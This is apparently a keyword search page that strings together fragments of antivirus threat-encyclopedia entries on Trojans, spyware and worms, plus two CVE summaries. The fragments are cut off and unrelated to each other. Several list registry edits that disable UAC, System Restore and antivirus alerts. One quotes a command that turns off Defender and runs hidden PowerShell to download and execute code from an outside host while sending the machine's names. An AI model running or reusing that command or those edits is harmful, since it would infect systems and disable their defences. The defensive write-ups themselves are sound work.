Keyword: unixliona1
\Microsoft\ Windows NT\CurrentVersion\SystemRestore DisableSR = "1" Dropping Routine This Trojan drops the following files: %System Root%\36f8ee1a\36f8ee1a.exe %User Profile%\Application Data\36f8ee1a.exe
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
\ FEATURE_BROWSER_EMULATION iexplore.exe = "22b8" HKEY_CURRENT_USER\Software\51e5db588f 36fb3192 = "{random characters}" HKEY_LOCAL_MACHINE\SOFTWARE\Policies\ Microsoft\Windows\WindowsUpdate DisableOSUpgrade = "1
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
CVE-2010-3654 Adobe Flash Player before 9.0.289.0 and 10.x before 10.1.102.64 on Windows, Mac OS X, Linux, and Solaris and 10.1.95.1 on Android, and authplay.dll (aka AuthPlayLib.bundle or
CVE-2009-1955 The expat XML parser in the apr_xml_* interface in xml/apr_xml.c in Apache APR-util before 1.3.7, as used in the mod_dav and mod_dav_svn modules in the Apache HTTP Server, allows remote
%\Howard\Howard.exe" 5 %System%\PING.EXE ping 127.0.0.1 "%Program Files%\Howard\Howard.exe" 4 %Program Files%\MachinerData\Howard.exe 1 (Note: %User Temp% is the current user's Temp folder, which is
This Trojan Spy arrives as an attachment to email messages spammed by other malware/grayware or malicious users. It arrives on a system as a file dropped by other malware or as a file downloaded
" HKEY_CURRENT_USER\Software\Microsoft\ RestartManager\Session0000 Sequence = "1" HKEY_CURRENT_USER\Software\Microsoft\ RestartManager\Session0000 RegFiles0000 = "\x00\x00\x00" HKEY_CURRENT_USER\Software\Microsoft
\ClassicStartMenu {871C5380-42A0-1069-A2EA-08002B30309D} = "1" HKEY_CURRENT_USER\Software\Microsoft\ Windows\CurrentVersion\Explorer\ HideDesktopIcons\NewStartPanel {871C5380-42A0-1069-A2EA-08002B30309D} = "1
This spyware uses social engineering methods to lure users into performing certain actions that may, directly or indirectly, cause malicious routines to be performed. Specifically, it disguises as a
EnableLUA = "0" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Security Center AntiVirusOverride = "1" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\ Security Center AntiVirusDisableNotify = "1" HKEY_LOCAL_MACHINE\SOFTWARE
following registry entries: HKEY_LOCAL_MACHINE\SOFTWARE\PCSpeedupPro.net\ PC Speedup-Pro TELNO = "(855)-332-0124" HKEY_LOCAL_MACHINE\SOFTWARE\PCSpeedupPro.net\ PC Speedup-Pro ISTELNO = "1" HKEY_LOCAL_MACHINE
"Apartment" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ ToolboxBitmap32 (Default) = "%System%\mshtmled.dll, 1" HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ Wow6432Node\CLSID\{{GUID}}\ MiscStatus
Set-MpPreference -DisableRealtimeMonitoring 1 & powershell -w hidden IEx(New-Object Net.WebClient).DownLoadString(''http://t.tr2q.com/mail.jsp?js*{computer username}*{computer name}*''+[Environment
This spyware may be dropped by other malware. It modifies the affected system's HOSTS files. This prevents users from accessing certain websites. It attempts to steal sensitive online banking
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This Trojan arrives on a system as a
This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It deletes itself after execution. Arrival Details This
This worm arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. It disables Task Manager, Registry Editor, and Folder
This backdoor arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites. Arrival Details This backdoor arrives on a system as a